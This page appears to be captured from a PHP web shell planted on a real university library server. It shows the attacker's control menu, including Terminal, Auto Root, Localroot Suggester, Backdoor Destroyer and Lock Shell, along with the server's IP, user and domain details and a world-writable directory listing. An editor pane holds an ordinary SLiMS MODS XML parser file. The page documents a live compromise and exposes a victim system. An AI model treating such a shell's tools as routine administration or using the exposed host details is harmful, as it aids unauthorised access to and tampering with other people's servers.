Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 18.191.132.105
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
elibrary /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
Zend
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
contents
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
flex
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
lang
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
marc
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
minigalnano
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
oaipmh
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
parsedown
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
phpbarcode
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
phplot
[ DIR ]
drwxrwxrwx
2025-04-26 19:22
phpmailer
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
recaptcha
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
slide
[ DIR ]
drwxrwxrwx
2024-08-22 20:25
sphinx
[ DIR ]
drwxrwxrwx
2020-02-14 07:54
AltoRouter.php
7.18
KB
-rw-rw-rw-
2020-02-14 07:54
VideoStream.php
3.14
KB
-rw-rw-rw-
2020-02-14 07:54
admin_logon.inc.php
11.67
KB
-rw-rw-rw-
2020-02-14 07:54
api.inc.php
18.72
KB
-rw-rw-rw-
2020-02-14 07:54
biblio_list.inc.php
11.18
KB
-rw-rw-rw-
2020-02-14 07:54
biblio_list_elasticsearch.inc.php
8.42
KB
-rw-rw-rw-
2020-02-14 07:54
biblio_list_index.inc.php
9.45
KB
-rw-rw-rw-
2020-02-14 07:54
biblio_list_model.inc.php
16.45
KB
-rw-rw-rw-
2020-02-14 07:54
biblio_list_mongodb.inc.php
6.04
KB
-rw-rw-rw-
2020-02-14 07:54
biblio_list_sphinx.inc.php
10.85
KB
-rw-rw-rw-
2020-02-14 07:54
biblio_list_sqlite.inc.php
8.38
KB
-rw-rw-rw-
2020-02-14 07:54
circulation_api.inc.php
7.06
KB
-rw-rw-rw-
2020-02-14 07:54
comment.inc.php
3.02
KB
-rw-rw-rw-
2020-02-14 07:54
content.inc.php
4.66
KB
-rw-rw-rw-
2020-02-14 07:54
content_custom.inc.php
3.14
KB
-rw-rw-rw-
2020-02-14 07:54
content_list.inc.php
3.22
KB
-rw-rw-rw-
2020-02-14 07:54
detail.inc.php
48.75
KB
-rw-rw-rw-
2020-02-14 07:54
http_request.inc.php
5.96
KB
-rw-rw-rw-
2020-02-14 07:54
index.html
75
B
-rw-rw-rw-
2020-02-14 07:54
index.php
35
B
-rw-rw-rw-
2020-02-14 07:54
ip_based_access.inc.php
1.95
KB
-rw-rw-rw-
2020-02-14 07:54
marcxmlsenayan.inc.php
10.16
KB
-rw-rw-rw-
2020-02-14 07:54
member_api.inc.php
1.73
KB
-rw-rw-rw-
2020-02-14 07:54
member_logon.inc.php
9.98
KB
-rw-rw-rw-
2020-02-14 07:54
member_session.inc.php
1.42
KB
-rw-rw-rw-
2020-02-14 07:54
modsxmlsenayan.inc.php
7.59
KB
-rw-rw-rw-
2020-02-14 07:54
modsxmlslims.inc.php
5.29
KB
-rw-rw-rw-
2020-02-14 07:54
module.inc.php
6.28
KB
-rw-rw-rw-
2020-02-14 07:54
oai-pmh.inc.php
13.47
KB
-rw-rw-rw-
2020-02-14 07:54
phpwebsocket.php
26.26
KB
-rw-rw-rw-
2020-02-14 07:54
router.inc.php
4.1
KB
-rw-rw-rw-
2020-02-14 07:54
utility.inc.php
20.89
KB
-rw-rw-rw-
2020-02-14 07:54
Save
Rename
<?php /** * * MODS XML to SENAYAN * * Copyright (C) 2011,2012 Arie Nugraha (dicarve@gmail.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /** * MODS XML Record parser * @param object $modsrecords: XML record object from simpleXML * @return array **/ function modsXMLslims($modsrecords) { $data = array(); # authors $data['authors'] = array(); # title $data['title'] = (string)$modsrecords->titleInfo->title; if (isset($modsrecords->titleInfo->subTitle)) { $data['title'] .= ': '.(string)$modsrecords->titleInfo->subTitle; } # name/author (repeatable) if (isset($modsrecords->name) AND $modsrecords->name) { foreach ($modsrecords->name as $value) { $_author_type = $value['type']; if ($value->role->roleTerm == 'Primary Author') { $_level = 1; } else { $_level = 2; } $data['authors'][] = array('name' => (string)$value->namePart, 'authority_list' => (string)$value['authority'], 'level' => $_level, 'author_type' => (string)$_author_type); // $data['authors'][] = (string)$value->namePart; } } # mods->typeOfResource $data['manuscript'] = (boolean)$modsrecords->typeOfResource['manuscript'] == 'yes'; $data['collection'] = (boolean)$modsrecords->typeOfResource['collection'] == 'yes'; $data['resource_type'] = (string)$modsrecords->typeOfResource; # mods->genre $data['genre_authority'] = (string)$modsrecords->genre['authority']; $data['genre'] = (string)$modsrecords->genre; # mods->originInfo $data['publish_place'] = isset($modsrecords->originInfo->place->placeTerm)?(string)$modsrecords->originInfo->place->placeTerm:''; $data['publisher'] = (string)$modsrecords->originInfo->publisher; $data['publish_year'] = (string)$modsrecords->originInfo->dateIssued; $data['issuance'] = (string)$modsrecords->originInfo->issuance; $data['edition'] = (string)$modsrecords->originInfo->edition; # mods->language if (isset($modsrecords->language->languageTerm)) { foreach ($modsrecords->language->languageTerm as $_langterm) { if ($_langterm['type'] == 'code') { $data['language']['code'] = (string)$_langterm; } else { $data['language']['name'] = (string)$_langterm; } } } # mods->physicalDescription $data['gmd'] = (string)$modsrecords->physicalDescription->form; $data['collation'] = (string)$modsrecords->physicalDescription->extent; # mods->relatedItem if ($modsrecords->relatedItem['type'] == 'series') { $data['series_title'] = (string)$modsrecords->relatedItem->titleInfo->title; } # mods->note $data['notes'] = (string)$modsrecords->note; # mods->subject $_term_type = 'topical'; $_term = ''; foreach ($modsrecords->subject as $_subj) { $_authority = (string)$_subj['authority']; if (isset($_subj->topic)) { $_term_type = 'topical'; $_term = (string)$_subj->topic; } if (isset($_subj->geographic)) { $_term_type = 'geographic'; $_term = (string)$_subj->geographic; } if (isset($_subj->name)) { $_term_type = 'name'; $_term = (string)$_subj->name; } if (isset($_subj->temporal)) { $_term_type = 'temporal'; $_term = (string)$_subj->temporal; } if (isset($_subj->genre)) { $_term_type = 'genre'; $_term = (string)$_subj->genre; } if (isset($_subj->occupation)) { $_term_type = 'occupation'; $_term = (string)$_subj->occupation; } $data['subjects'][] = array('term' => $_term, 'term_type' => $_term_type, 'authority' => $_authority); } # mods->classification $data['classification'] = (string)$modsrecords->classification; # mods->identifier if ($modsrecords->identifier['type'] == 'isbn') { $data['isbn_issn'] = (string)$modsrecords->identifier; } # mods->location $data['location'] = (string)$modsrecords->location->physicalLocation; $data['call_number'] = (string)$modsrecords->location->shelfLocator; # mods->recordInfo if (isset($modsrecords->recordInfo)) { $data['id'] = (string)$modsrecords->recordInfo->recordIdentifier; $data['create_date'] = (string)$modsrecords->recordInfo->recordCreationDate; $data['modified_date'] = (string)$modsrecords->recordInfo->recordChangeDate; $data['origin'] = (string)$modsrecords->recordInfo->recordOrigin; } return $data; }